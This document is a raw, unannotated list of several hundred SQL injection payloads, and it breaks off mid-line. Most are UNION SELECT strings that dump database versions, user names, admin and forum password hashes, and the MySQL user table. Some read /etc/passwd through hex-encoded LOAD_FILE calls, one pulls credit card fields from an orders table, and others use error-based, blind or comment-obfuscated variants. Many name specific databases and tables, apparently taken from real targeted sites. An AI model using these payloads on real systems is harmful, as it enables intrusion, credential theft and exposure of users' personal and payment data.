-8943 union select 1,concat(user,0x3a,password),3,4,5,6,7,8,9 from mysql.user/* -89483 union select 1,2,concat(nick,char(58),pwd,char(58),mail),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from forum_users limit 1,1/* -8949 union select 1,2,3,4,5,6,7,table_name,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables limit 42,1/* -894' union select 1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/* -895 union select 1,version(),3,table_name,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables limit 16,1 -89641 union select concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7 897987984798798798 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40-- -898' union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- -8997 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,concat_ws(0x3a,version(),database(),user()),33,34,35,36,37,38,39,40,41,42,43,44-- 8-999.9 union select concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14-- 8999 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),version(),database()),14/* -899 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- 89 and 1=1 union select 1,2,uUsername,4,5,6,7,8,uPassword from tblusersDBServer: MSAccessResp.Time(avg): 1465msWebRoot: C:\Windows\SysWOW64\inetsrv\ -89 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from namo_user_level -- -89 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,VERSION(),DATABASE(),USER()),16,17/* -89 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(char(58),version(),user(),database()),16,17,18,19,20,21,22,23/* -89' union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,0,11,12,13,14,15,16,17 -- 89 union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -89 union select 1,2,3,4,5,concat_ws(char(47),user(),database(),version()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -89 union select 1,2,3,4,concat_ws(0x3a3a,username,user_password),6,7,8,9,10,11,12 from phpbb3_users limit 1,1 -- -89 union select 1,2,3,concat(user,0x3a,pass,0x3a,id),5,6 from users/* -89 union select 1,2,3,concat_ws(0x3a,username,user_password),5,6,7,8,9,0,1,2,3,4,5 from phpbb_users limit 1,1/* -89 union select 1,2,concat_ws(0x3a,id,name,login,password,email),4,5,6 from users limit 0,1/* -89 union select 1,2,concat_ws(0x3a,version(),user -89 UNION SELECT 1,CONCAT(VERSION(),0x3a,USER(),0x3a,DATABASE()),3,4,5/* -89 union select 1,login,3,4,5,6,7,8,9,10,11,12,13,14 from admin/* 89' union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* -89 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,database(),user()/* -89 union select concat(login,0x3a,pass) from users/* -89 union select concat_ws(0x3a,user(),database(),version()),2,3,4,5,6,7,8,9/* -89 union select concat_ws(0x3a,version(),user()),2,3,4,5,6,7,8,9/* -89 union select uname,2,3,4,5,6 from nuke_users limit 1,1 8' and 0 union select 1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19,20,21 from information_schema.tables where table_schema<>'information_schema'-- 8 and 1=0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 8/**/and/**/1=0/**//*!union*/ /*!select*/ 1,2,3,4,5,count(email),7,8,9,10,11,12,13,14 from memberitems-- 8 and 1=0 union select 1,2,version(),4,5 -- 8 and 1=0 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5-- 8 and 1=0 union select 1,concat_ws(0x3a,version(),user()),3-- 8 and 1=2 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9 -- 8 and 1=2 union select 1,2,group_concat(login,0x3a,password),4 from admin-- 8 and 1=2 union select 1,2,UNHEX(HEX(concat_ws(0x3a,user(),version(),database()))),4,5,6,7-- -8 and 1=2 union select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4,5,6 -- 8 and 1=2 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables/* 8 and 1=2 union select COLUMN_NAME,2,3 from information_schema.COLUMNS where TABLE_NAME=0x7573657273 -- 8 and 1=2 union select concat_ws(0x3A,usuario,login,permissao),2 from db_admusers/* 8 AND ascii(lower(substring(concat(user(),0x3a,version(),database()),2,1)))>1 -8 or(1,1)=(select count(0),concat((select concat_ws(0x3a,user(),version(),database(),@@version_compile_os) from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables)group by 2)-- 8romeo_void' union select 1,concat_ws(char(58),version(),user(),database()),3,4 -- -8/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,username,password),15,16,17 from users/* -8 union all select concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os) -- -8 UNION SELECT 0,1,2,3,concat_ws(0x0b,user(),version(),database()),5 -8 union select 0,1,2,3,concat_ws(0x3a,fname,lname,pwd) from trainers-- -8 UNION SELECT 0,1,2,concat_Ws(0x0b,user(),database(),version()),4,5,6 -- 8' UNION SELECT 0,1,2,concat_ws(0x0b,version(),database(),user()),4 -- -8 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,convert(table_name using utf8),9,0,1,2,3 from information_schema.tables/* -8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75 -- -8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,version(),database(),useR()),60 -8 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14,15,16 from mysql.user-- 8' union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19-- 8' union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16,17,18,19 from eaglepr_eaglepro.eagle_tbladmin-- -8 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name) from information_schema.columns where column_name like 0x257061737325 -- 8 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13-- 8 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),user(),database()),11/* -8' union select 1,2,3,4,5,6,7,8,9,user(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 -- -8 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12/* -8 union select 1,2,3,4,5,6,7,8 from ability_categories/* -8 union select 1,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from mysql.user limit 0,1-- -8 union select 1,2,3,4,5,6,7,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),9,10,11,12,13,14,15,16,17/* -8 UNION SELECT 1,2,3,4,5,6,7 From phpads_clients/* -8 union select 1,2,3,4,5,6,7,pass,9,name,11,12,13 from orizon_db1.admin limit 1,1-- 8 union select 1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user()),8/* -8 union select 1,2,3,4,5,6,concat(version(),0x3a,user(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/* -8 union select 1,2,3,4,5,6,concat_ws(0x2a,database(),version(),user(),@@version_compile_os),8,9,10,11 -8 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14-- -8 union selecT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),8,9,0,1-- -8 union select 1,2,3,4,5,6,concat_ws(char(58),user(),version(),database())/* 8 UNION SELECT 1,2,3,4,5,6,concat_ws(char(58),version(),user(),database()) LIMIT 1,1/* -8 union select 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_name=0x7068706C6973745F61646D696E -- -8 union select 1,2,3,4,5,6,LOAD_FILE(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 8 union select 1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- -8 union select 1,2,3,4,5,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),7,group_concat(0x0b,email),9,10,11,12,13 from member-- -8 union select 1,2,3,4,5,convert(version() using latin1),7,8 from user -8 union select 1,2,3,4,5,group_concat(username,char(58),pass),7,8,9,10,11 from endopedonline.users-- -8 union select 1,2,3,4,5,user(),7 -- -8 union select 1,2,3,4,5,VERSION(),USER()/* -8 union select 1,2,3,4,concat(convert(email using latin1),char(58),convert(pass using latin1)),6,7,8 from users limit 2,1/* -8 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from mp218_users/* -8 union Select 1,2,3,4,concat(user,0x3a,password),6 from mysql.user -8 union select 1,2,3,4,concat(username,0x3a,pass,0x3a,id),6,7,8,9,10,11,12,13,14,15 from users limit 0,1/* -8 union select 1,2,3,4,concat_Ws(0x3a,login,pass),6,7,8,9,10 from admin-- -8 union select 1,2,3,4,concat_ws(0x3a,username,email,password),6,7,8,9,0,11 from antoria.jos_users/* -8 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,0 8 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15-- -8 union select 1,2,3,4,unhex(hex(uSer())) -- -8 union select 1,2,3,4,user(),6,7,8,9,10,11 -- -8 union select 1,2,3,4,version(),6,7,8,9/* -8 union select 1,2,3,4,version(),user(),database(),8,9,0,11,12,13,14/* -8 union select 1,2,3,concat(login,0x3a,passw),5 from users/* -8 UNION SELECT 1,2,3,concat(user(),0x3a,database(),0x3a,version()),5/* -8 union select 1,2,3,concat(user,char(58),password),5,6,7,8 from mysql.user -8 union select 1,2,3,concat_Ws(0x3a3a,adminUsername,adminPassword),5,6,7 from tabFoamAdmin limit 1,1 -- -8' union select 1,2,3,concat_ws(0x3a3a,login,password),5,6,7,8,9,10,11 from users limit 1,1 -- 8 union select 1,2,3,concat_ws(0x3a3a,user_name,password),5,6 from user -- -8 union select 1,2,3,concat_ws(0x3a3a,username,password,email),5,6,7,8,9 from members where type=0x61646D696E /* -8 union select 1,2,3,concat_ws(0x3a,user(),database(),version())-- -8 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- 8' union select 1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11 -- -8 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5,6,7,8,9-- -8 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 8 UNION SELECT 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14 LIMIT 1,1-- -8 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9 -- -8' union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 -- -8 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16 from INFORMATION_SCHEMA.TABLES limit 29,1/* -8 union select 1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10,11,12,13/* -8 union select 1,2,concat(user,char(58),password),4,5 from mysql.user/* -8 union select 1,2,concat(username,0x3a,0x3a,password,0x3a,email),4,5,6,7 from user/* 8 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from mysql.user limit 1,1/* 8 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 limit 1,1/* -8 union select 1,2,concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),0x494E43,5,6,7,8,9,10,11-- -8 union select 1,2,concat_Ws(0x3a3a,Id,adminUsername,adminPassword),4,5,6,7 from tabAdmin -- -8 union select 1,2,concat_ws(0x3a,id,usr,name,pwd),4,5,6,7,8 from adm_users limit 0,1 -8 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -8 union select 1,2,concat_ws(0x3a,version(),user()),4,5,6,7,8,9,10,11,12,13-- -8 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7/* -8 union select 1,2,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),4,5,6,7,8,9,10,11/* -8 union select 1,2,concat_ws(char(32),user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11 from information_schema.tables-- -8 union select 1,2,CONCAT_WS(char(58),version(),user(),database()),4,5,6,7,8 -8 union select 1,2,concat_ws(version(),user(),database())-- -8 union select 1,2,convert(version() using latin1),4,5,6,7,8 -8 union select 1,2,database(),4,5,6/* -8 UNION SELECT 1,2 FROM SNTA_users/* -8 union select 1,2,group_concat(0x0b,login,0x3a,passwd) from users-- -8 union select 1,2,group_concat(user(),0x3a,database(),0x3a,version()),4,5 -8 union select 1,2,id,4,password,6,7,8,9,10,11,12,13,14,15 from users /* -8 union select 1,2,load_file(0x2f7573722f6c6f63616c2f7777772f6c6f67696e737469747574652f61646d696e2f70656e64696e672e70687033),4,5,6,7/* -8 union select 1,2,null,4,5,version(),7,8/* -8 UNION SELECT 1,2,passwd,4,5 FROM admin/* -8 union select 1,2,user(),concat(database(),char(58),version()),5,6,7,8,9,10,11,12,13/* -8 union select 1,2,username,password,5,6,7 from admin/* -8 union select 1,2,version() admin/* -8 union select 1,aes_decrypt(aes_encrypt(user(),0x71),0x71),3,4,5,6/* -8 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71)/* -8 union select 1,cast(concat_ws(0x3a,version(),user(),database()) as binary)/* 8 union select 1,concat(0x7c,user(),0x7c,database(),0x7c,version()),3,4,5,6 -- -8 union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4-- 8' union select 1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11/* -8 union select 1,concat(username,char(58),password),3,4,5,6,7,8 from prgp_user/* -8 union select 1,concat(username,char(58),Password),3,4,5,6 from admin -- -8 union select 1,concat_ws(0x0b,database(),user(),version(),@@version_compile_os),3,now(),5,6,7,8,9 -8' union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,group_concat(0x0b,admin_login,0x3a,admin_password,0x3a,admin_email),6 from admin-- -8 union select 1,concat_ws(0x3a3a,version(),user(),database())/* -8 union select 1,concat_ws(0x3a,ID,DATE_REG,IPADRESS,AGENT,AGENT_TYPE,IDFIRM,LOGIN,PASS,MAILS,MAIL_PUBLIC,PHONE_AGENT,CONTACT_AGENT,BIRTHDAY,POL,IDSTATUS,ABOUT,OPEN,ACTIV_CODE),3,4,5,6,7,8,9,10,11 from users-- -8 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9 -- -8 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13-- -8 union select 1,concat_ws(0x3a,version(),user()),3,4,5-- -8 union select 1,concat_ws(0x3a,version(),user()),3,4,5,6,7 -- -8 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5 -8 union select 1,concat_ws(char(58),version(),user(),database()),3,4,5 -- -8 union select 1,convert(version() using cp1251)/* -8 union select 1,database(),3,4/* -8 union select 1,group_concat(0x0b,version(),0x0b,user(),0x0b,database(),0x0b,@@version_compile_os,0x0b,admin_userid,0x3a,admin_password),3,4,5,6,7,8,9 from tbl_admin-- -8 union select 1,group_concat(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13-- -8 union select 1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9 from mysql.user/* -8 union select 1,user()/*-- -8 union select 1,user(),version(),4,5,6,7 from users/* -8 union select 1,version()-- -8 union select 1,@@version,3,4,5,6,7,8,9,10,11-- -8 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -- -8 union select 1,version(),database(),concat(login,0x3a,pass),5,user(),7,8,9 from bgblog.user-- -8 union select 1,version(),user()-- -8 union select aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x3a),0x3a)/* -8 union select concat(user,0x20,password) from mysql.user-- -8 union select concat(user(),0x3a,database(),0x3a,version()),2,3,4,5,6/* -8 union select concat(user(),0x3a,version()),concat(id,0x3a,username,0x3a,password,0x3a,email),3 from web_users/* -8 union select concat(username,char(58),password),2,3,4 from users limit 1,10/* 8 union select concat_ws(0x2a,database(),version(),user(),@@version_compile_os) -- -8 UNION SELECT concat_ws(0x2b,user(),version(),database()),2,3,4,5,6,7,8 -8 union select concat_ws(0x2f,version(),user(),database()),2,3,4,5,6/* -8) union select concat_ws(0x3a2a3a,version(),database(),user(),@version_compile_os)-- -8 union select concat_ws(0x3a3a,version(),user(),database())/* -8 union select concat_ws(0x3a,database(),version(),user()),2,3,4,5,6-- -8 union select concat_ws(0x3a,login,pass) from administrador -- -8 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6 -- -8 union select concat_ws(0x3a,@@version_compile_os,user(),version(),database())-- 8 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8 LIMIT 1,1/* -8 ' UNION SELECT concat_ws(0x3a,version(),user(),database()) -- 8 union select concat_ws(0x3a,version(),user(),database()),2/* -8 union select concat_ws(char(58),username,password) from admin 8 union select database(),2,3,4,5,6,7,8 from User -- 8 union select null,null,null,null,null from pages/* -8 union select unhex(hex(version()))-- -8 union select user(),2,3,4-- -8 /*!UnIon selECt version()*/ -8 union select version(),2,3,4/* -9000 UNION SELECT 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7 -- 9002-999.9 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- -90061 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,user(),version(),23,24,25/* -900 union select 1,2,pass,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users/* 900 union select 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/* -900 union select 1,login,3,4,password,6,7 from cms_system_users /* -900 UNION SELECT concat_ws(0x3a,user(),version(),database()) -- 9012001 union select 1,2,version(),user(),5,6,7,8,9,10,11,12,13,14,15/* 9012345183 union select concat_ws(0x3a,user(),version(),database()),2-- 902' union select 1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5-- 9032 and 0 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables-- -903 union select 1,2,3,4,5,6 from users/* -904 union select 1,login,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from users /* -905 union select 1,2,3,4,5,6,7-- -90609 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1-- -9061 union select 1,2,3,4,5,6,7,8,9,0,1,concat_ws(char(58),username,user_password,user_icq,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5 from phpbb_users/* 906-999.9 union select 1,2,3,4,5,6,7,8,concat_ws(user(),version(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74-- 90809776656544443348908 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54-- 9088976331 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database())-- 909888422 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -909 union select concat_ws(0x3a,login,pwd),2 from users limit 0,1/* 90 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version()),4,5,6-- 90 and lower(substring(version(),1,1))=4 90 union all select group_concat(user_name,0x3a,user_pass,0x3a,user_email),2 from admin_user-- 90 union select 0,1,username,password,4,5,6,7 from admin 90 union select 111,222,333,user(),555,666,version(),888,999/* -90 /**/ UNioN /**/ /**/ SelECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,user(),42,43,44 -- -90 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x203a20,table_schema,table_name,column_name),0x55),0x55),6,7,8,9 from information_schema.columns/* -90 union select 1,2,3,4,concat(@i:=0x00,@o:=0x0d0a,benchmark(58,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),6,7,8,9,0,1,2,3-- -90 UNION SELECT 1,2,3,4,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),6,7,8,9,0-- -90 union select 1,2,3,4,group_concat(0x0b,table_name),6,7,8,9,10 from information_schema.tables-- -90 union select 1,2,3,concat(0x2a,user(),0x2a,database(),0x2a,version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 -90 UNION SELECT 1,2,3,passwd,username FROM users/* -90 union select 1,2,concat(database(),0x3a,version(),0x3a,user()),4,5/* -90 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/* -90 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5/* -90 union select unhex(hex(concat_ws(0x3a,user_name,user_password))),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from eholla_bis.user/* 910 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15-- -9110 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 -- -9111 union select 1,2,3,4,5,6,7,8,concat_ws(0x2f,name,pass,mail),10,11,12,13,14 from users limit 1,4-- -9114 union select 1,2,3,4,5,6,7,8,9,0,1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- 911.911 union ALL select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(version(),0x3a,database(),0x3a,user()),17,18,19 -- -911 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(0x2a,database(),version(),user(),@@version_compile_os) from information_schema.columns limit 0,1),1,64),floor(rand(0)*2)))-- 911 union select 1,2,3,4,concat_ws(0x3a,database(),version(),user()),6,7,8,9 9128 UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,null,5,6,null,8-- -912 union select 1,concat_ws(0x2f,user,password) from mysql.user-- -913 union select 1,concat_ws(0x3a,version(),user()),3,4 -- -9142 union select concat_ws(0x3a,database(),user(),version()) -- -915 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17 -915 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -915 union select 1,concat_ws(0x3C62723E,username,passwd,email),3,4,5,6,7,8,9,10,11,12,13,14 from user limit 50,1/* -9173 union select 1,2,3,4,5,6,7,8,9,0,10,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,concat_ws(0x3a,id,username,sname,address1,address2,country,postcode,city,state,currency,dphone,ahphone,lastlogin,ptype,email,bname,baddress1,baddress2,bcountry,bpostcode,bcity,bstate,cctype,ccnumber,ccexpirym,ccexpiryd,message,postage,dateemail,datepaid,datecleared,daterem,maintr,reminded,pmethod,date,total,fullname,require_phonecall),32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 from orders-- -9174 union select 1,2,concat_ws(0x3a,id,login,password),4,5,6,7 from uajournal_db.users-- -9174 union select 1,version(),3,4,5,6,7,8,9,10,11/* -917 union select 1,concat_ws(0x3a,version(),0x3a,user(),@@version_compile_os),3,4,5 -- -917 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5-- 9189 union select 1,2,table_name,4,5,6,7,8,9,0,1,2,3 from information_schema.tables/* 918 union select 0,1,2,3,4,5,6,7,8,9,10,11,12 from msysobjects in '.' -91996 union select 1,2,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- 91 and 1=0 union select 1,2,concat_ws(0x3a,id,login,password),4,5,6,7 from a_admin_users limit 1,1 -- -91 UNION ALL SELECT 1,2,concat_ws(0x3a,username,password,usertype),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from jos_users -- -91 union select 1,2,3,4,5,6,concat(user,0x3a,password),8,9 from mysql.user/* -91 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65-- -91 union select 1,2,3,concat(id,0x3a,login,0x3a,password),5,6,7,8,9 from users/* -91 union select 1,2,concat_ws(0x3a,user,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from mysql.user -- -91' union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15/* 9-1 union select 1,concat_ws(' ; ',database(),user(),version()),group_concat(table_name),4,5,6,7,8,9 from information_schema.tables-- -91 union select 1,table_name,3,4,5,6,7 from information_schema.tables-- -9-1 union select 1,table_name,3 from information_schema.tables limit 30,1-- -91 union select concat(user(),version(),database(),@@version_compile_os),2 -91 union select concat_ws(0x2a2a,login,password),2,3,4,5,6,7 from admin limit 1,3-- -91 union select group_concat(column_name) from information_schema.columns where table_name=0x666f72756d-- -920 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3a,version(),user(),database()),22,23 -920' union select 1,version(),3,4,5,6,7,8,9,10-- 921 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('WinterPicnic2007','WinterPicnic2006','WebSite','Vacancies','v_Partners','v_Holidays','v_FieldOfficesReport','v_Autumn2004Results','syssegments','sysconstraints','SummerPicnic2005','SummerPicnic2004','SuccessStoryProjects','SuccessStory','SpringPicnic2006p2','SpringPicnic2006','Sections','RecentNewsandEvents','Procurement','Picnic','phone','Partners','PartnerContacts','links','Holidays','FieldOfficesReport','faxes','E_mails','dtproperties','Content','conference','Competition','BusReservation','Bowling','AutumnPicnic2005p2','AutumnPicnic2005','Organizer','Articles','AutumnPicnic2004'))-- 9222 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18 -- -9224 union select 1,concat_ws(0x3a3a,username,password,status,email,userID),3,4,5,6,7 from Users where status=0x61646D696E limit 5,1 -- 922' union select 1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14 from user/* -923 union select 1,concat_ws(0x3a,database(),version(),user()),3,4-- -923 union select 1,concat_ws(0x3a,version(),user()),3,4 923 union select concat_ws(0x3a,EMAIL_USER,PASSWORD) from users limit 1,1-- -9258 UNION SELECT 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- -9268 union select 